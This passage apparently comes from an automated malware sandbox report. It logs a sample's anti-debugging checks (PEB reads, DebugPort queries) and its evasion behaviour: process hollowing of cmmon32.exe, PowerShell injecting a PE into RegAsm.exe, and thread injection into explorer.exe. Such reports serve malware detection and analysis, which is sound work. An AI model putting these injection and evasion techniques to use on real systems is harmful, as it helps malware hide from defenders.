          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_04821C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_04821C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_04821C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_04821C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_04821C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_04821C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_04821C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_04821C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_04821C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_047E6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_047E6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_047E6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_0483740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_0483740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_0483740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_0477849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_0478C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_0478C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_04787D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_048305AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_048305AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_047A3D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_047E3540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_04794D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_04794D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_04794D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_04773D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_04773D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_04773D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_04773D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_04773D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_04773D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_04773D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_04773D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_04773D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_04773D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_04773D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_04773D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_04773D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_0476AD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_047EA537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_0482FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_0482FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_0482FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_0482FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_04818DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_0477D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_0477D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_04838D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_047E6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_047E6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_047E6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_047E6DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_047E6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_047E6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_0482E539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_04813D40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_04791DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_04791DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_04791DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_047935A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_0479FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_0479FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_04792581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_04792581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_04792581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_04792581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_04762D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_04762D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_04762D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_04762D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_04762D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_0478AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_0478AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_0478AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_0478AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_0478AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_0477766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_04830EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_04830EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_04830EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_04777E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_04777E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_04777E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_04777E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_04777E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_04777E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_0481FEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_04838ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_0476E620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_0479A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_0479A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_0476C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_0476C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_0476C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_04798E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_04821608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_047776E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_047916E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_047936CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_047A8EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_0481FE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_0482AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_0482AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_047E46A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_047FFE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_0477FF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_0477EF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_0478B73D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_0478B73D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_0479E730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_04764F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_04764F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_0478F716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_047FFF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_047FFF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_0479A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_0479A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_0483070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_0483070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_047A37F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_04778794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_04838F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_047E7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_047E7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_047E7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_04780050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_04780050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_0478A830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_0478A830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_0478A830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_0478A830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_0479002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_0479002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_0479002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_0479002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_0479002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_0477B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_0477B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_0477B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_0477B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_047E7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_047E7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_047E7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_04834015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_04834015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_047640E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_047640E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_047640E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_047658EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_0478B8E4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_0478B8E4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_047FB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_047FB8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_047FB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_047FB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_047FB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_047FB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_0479F0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_0479F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_0479F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_047A90AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_047920A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_047920A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_047920A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_047920A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_047920A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_047920A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_04822073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_04769080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_04831074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_047E3884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_047E3884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_0476B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_0476B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_0476C962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_048249A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_048249A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_048249A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_048249A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_0478B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_0478B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_0479513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_0479513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_04784120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_04784120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_04784120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_04784120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_04784120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_04769100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_04769100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_04769100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_047F41E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_0476B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_0476B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_0476B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_047E51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_047E51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_047E51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_047E51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_047899BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_047899BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_047899BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_047899BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_047899BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_047899BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_047899BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_047899BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_047899BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_047899BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_047899BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\cmmon32.exeProcess queried: DebugPort
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess queried: DebugPort
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02BA9A20 NtResumeThread,LdrInitializeThunk,

          HIPS / PFW / Operating System Protection Evasion

          barindex
          Sample uses process hollowing technique
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection unmapped: C:\Windows\SysWOW64\cmmon32.exe base address: 3E0000
          Maps a DLL or memory area into another process
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: unknown target: C:\Windows\SysWOW64\cmmon32.exe protection: execute and read and write
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: unknown target: C:\Windows\SysWOW64\cmmon32.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\cmmon32.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\cmmon32.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\cmmon32.exeSection loaded: unknown target: unknown protection: read write
          Source: C:\Windows\SysWOW64\cmmon32.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\cmmon32.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\cmmon32.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\cmmon32.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Writes to foreign memory regions
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: B14008
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 106A008
          Injects a PE file into a foreign processes
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A
          Queues an APC in another process (thread injection)
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread APC queued: target process: C:\Windows\explorer.exe
          Modifies the context of a thread in another process (thread injection)
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread register set: target process: 684
          Source: C:\Windows\SysWOW64\cmmon32.exeThread register set: target process: 684
          Source: C:\Windows\SysWOW64\cmmon32.exeThread register set: target process: 2596
          Source: C:\Windows\SysWOW64\cmmon32.exeThread register set: target process: 4996
